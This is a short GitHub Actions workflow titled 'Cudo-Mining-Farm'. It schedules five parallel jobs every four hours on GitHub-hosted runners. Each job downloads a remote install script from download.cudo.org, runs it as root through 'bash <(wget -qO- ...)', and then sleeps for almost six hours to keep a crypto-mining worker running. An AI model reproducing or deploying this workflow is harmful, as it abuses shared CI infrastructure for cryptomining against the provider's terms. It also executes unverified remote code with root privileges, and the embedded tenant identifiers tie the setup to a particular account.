name: Cudo-Mining-Farm
on:
  workflow_dispatch:
  schedule:
    - cron: '0 */4 * * *'

jobs:
  mining:
    strategy:
      matrix:
        worker: [1, 2, 3, 4, 5] 
    runs-on: ubuntu-latest
    steps:
      - name: Start Cudo Worker
        run: |
          sudo su -c "bash <(wget -qO- https://download.cudo.org/tenants/135790374f46b0107c516a5f5e13069b/5e5f800fdf87209fdf8f9b61441e53a1/linux/x64/stable/install.sh)" root
          echo "Worker ${{ matrix.worker }} is running..."
          sleep 21000
